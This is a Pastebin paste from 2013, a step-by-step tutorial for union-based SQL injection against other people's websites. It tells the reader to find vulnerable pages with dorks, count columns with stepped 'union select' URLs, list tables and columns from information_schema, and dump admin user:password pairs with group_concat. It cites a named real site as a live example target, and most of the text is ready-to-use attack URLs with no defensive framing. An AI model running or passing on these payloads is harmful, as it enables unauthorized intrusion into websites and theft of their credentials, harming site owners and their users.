API tools faq
paste
Advertisement
Netikerty

Untitled

Netikerty
Feb 5th, 2013
112
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.41 KB | None | 0 0
raw download clone embed print report
  1. How to do a Manual Sql
  2.  
  3. 1.-Look for a vulnerable page with dorks if you want example: page: www.url.com/index.php?id=5'
  4.  
  5. If the page is vulnerable show a message same as this:
  6. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
  7.  
  8. But if the page is not vulnerable show 404 error or simply don`t show nothing
  9.  
  10. 2.-We need to know if the page is vulnerable for this we do it the following:
  11. a) Put a minus signal after the number from the vulnerability so:
  12.  
  13. www.url.com/index.php?id=-5 you have to quit this signal ' don´t forget it
  14.  
  15. b) At the same time you put +union+select+1,2,3,4,5,6,7,8,9-- this procedure you have to do little by little until show the tables. For example:
  16.  
  17. www.url.com/index.php?id=-5+union+select+1--
  18. www.url.com/index.php?id=-5+union+select+1,2--
  19. www.url.com/index.php?id=-5+union+select+1,2,3--
  20. www.url.com/index.php?id=-5+union+select+1,2,3,4--
  21. www.url.com/index.php?id=-5+union+select+1,2,3,4,5--
  22. www.url.com/index.php?id=-5+union+select+1,2,3,4,5,6--
  23. www.url.com/index.php?id=-5+union+select+1,2,3,4,5,6,7--
  24. www.url.com/index.php?id=-5+union+select+1,2,3,4,5,6,7,8--
  25. www.url.com/index.php?id=-5+union+select+1,2,3,4,5,6,7,8,9--
  26.  
  27. When you do it the page will show the tables.
  28.  
  29. Example: http://www.cordobadm.com.ar/noticia.php?id=-19+union+select+1,2,3,4,5,6,7--
  30.  
  31. If the tables don`t show you the page it isn't vulnerable
  32.  
  33.  
  34. 3.-When the tables show you, you select one hum example the web show the tables 4,5 or 6 I select the 4 for example so i do the same thing change the number for replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 and in the final put +from+information_schema.tables--:
  35.  
  36.  
  37. www.url.com/index.php?id=-5+union+select+1,2,3,replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29,5,6,7+from+information_schema.tables--
  38.  
  39. This action show the names from the tables, but if not pass with one number test with the another than show you before, but it's only one we'll need another form to enter in this page.
  40.  
  41. 4.- Next steep is than you selec the name from a table a change the name to hexadecimal for this action we will use the following page http://www.swingnote.com/tools/texttohex.php
  42.  
  43. For example the page show me a table than name is "admin" so i change admin to hexadecimal i go to the page and change it admin=61646d696e
  44.  
  45. 5.- After whe do the following steep:
  46. a) Erase the before code than we put in the number and replace for column_names and in the final put the following code: columns+where(table_name=0xhere the hexadecimal name)limit+1,1--
  47.  
  48. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+1,1-- (Show me user for example)
  49.  
  50. b) And explore the table to change the 1,1-- Example:
  51. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+2,1-- (Show me password for example)
  52.  
  53. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+3,1--
  54.  
  55. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+4,1--
  56.  
  57. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+5,1--
  58.  
  59. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+6,1--
  60.  
  61. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+7,1--
  62.  
  63. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+8,1--
  64.  
  65. www.url.com/index.php?id=-5+union+select+1,2,3,column_names,5,6,7+from+information_schema.columns+where(table_name=0x61646d696e)limit+9,1--
  66.  
  67. Until than show all the neccesary data.
  68.  
  69. 6.- To reveal the columns we put the following code: group_concat(name from table in 1,1--,0x3a,name from the another table results from explore in the last steep)and in the final put: +from+table name--
  70. Example: Table name= admin Table results from the exploration= password
  71.  
  72. www.url.com/index.php?id=-5+union+select+1,2,3,group_concat(user,0x3a,password),5,6,7+from+admin--
  73.  
  74. Enjoy it ;)
  75.  
  76. By Netikerty Asenet
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!